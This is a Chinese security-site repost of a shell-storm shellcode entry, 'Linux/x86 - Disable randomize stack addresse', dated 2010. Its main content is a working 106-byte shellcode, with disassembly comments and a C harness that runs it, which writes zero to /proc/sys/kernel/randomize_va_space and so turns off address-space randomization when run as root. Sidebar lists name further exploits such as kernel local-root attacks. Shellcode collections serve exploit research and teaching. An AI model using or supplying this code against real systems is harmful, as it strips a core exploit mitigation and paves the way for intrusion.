首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux/x86 - Disable randomize stack addresse - 106 bytes
来源:http://www.shell-storm.org 作者:Salwan 发布时间:2010-05-26  

/*
Title:  Linux/x86 - Disable randomize stack addresse - 106 bytes
         (Set randomize_va_space to zero)
Author:  Jonathan Salwan <submit (!) shell-storm.org>
Web:     http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm

!Database of Shellcodes http://www.shell-storm.org/shellcode/

Date:  2010-05-25
Tested:  Linux 2.6.33 - i686

! You need root euid
*/

 

#include <stdio.h>

char sc[] = "\x31\xdb"                // xor    %ebx,%ebx
            "\x6a\x61"                // push   $0x61
            "\x89\xe3"                // mov    %esp,%ebx
            "\xb0\x0a"                // mov    $0xa,%al
            "\xcd\x80"                // int    $0x80
            "\x31\xdb"                // xor    %ebx,%ebx
            "\x6a\x65"                // push   $0x65
            "\x66\x68\x61\x63"        // pushw  $0x6361
            "\x68\x61\x5f\x73\x70"    // push   $0x70735f61
            "\x68\x7a\x65\x5f\x76"    // push   $0x765f657a
            "\x68\x64\x6f\x6d\x69"    // push   $0x696d6f64
            "\x68\x2f\x72\x61\x6e"    // push   $0x6e61722f
            "\x68\x72\x6e\x65\x6c"    // push   $0x6c656e72
            "\x68\x73\x2f\x6b\x65"    // push   $0x656b2f73
            "\x68\x63\x2f\x73\x79"    // push   $0x79732f63
            "\x68\x2f\x70\x72\x6f"    // push   $0x6f72702f
            "\x89\xe3"                // mov    %esp,%ebx
            "\x30\xc0"                // xor    %al,%al
            "\xb0\x11"                // mov    $0x11,%al
            "\x31\xc9"                // xor    %ecx,%ecx
            "\x66\xb9\x41\x04"        // mov    $0x441,%cx
            "\x31\xd2"                // xor    %edx,%edx
            "\x66\xba\xa4\x01"        // mov    $0x1a4,%dx
            "\x31\xc0"                // xor    %eax,%eax
            "\xb0\x05"                // mov    $0x5,%al
            "\xcd\x80"                // int    $0x80
            "\x89\xc3"                // mov    %eax,%ebx
            "\x31\xc9"                // xor    %ecx,%ecx
            "\x66\x68\x30\x0a"        // pushw  $0xa30
            "\x89\xe1"                // mov    %esp,%ecx
            "\x31\xd2"                // xor    %edx,%edx
            "\xb2\x02"                // mov    $0x2,%dl
            "\x31\xc0"                // xor    %eax,%eax
            "\xb0\x04"                // mov    $0x4,%al
            "\xcd\x80"                // int    $0x80
            "\xb0\x01"                // mov    $0x1,%al
            "\xcd\x80";               // int    $0x80

int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(sc));
        (*(void(*)()) sc)();

return 0;
}

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Open&Compact Ftp Server 1.2 Un
·POC - SEH control (0day) of We
·Solaris/x86 - Remote Download
·e107 <= 0.7.20 Code Execution
·WebAsys blind SQL Injection Ex
·linux/x86 pwrite("/etc/shadow"
·linux/x86 alphanumeric Bomb FO
·Kingsoft WebShield KAVSafe.sys
·Flock web browser v2.5.6 (Remo
·Media Player Classic - v 1.3.1
·Adobe Photoshop CS4 Extended 1
·WinDirectAudio (.WAV) PoC
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved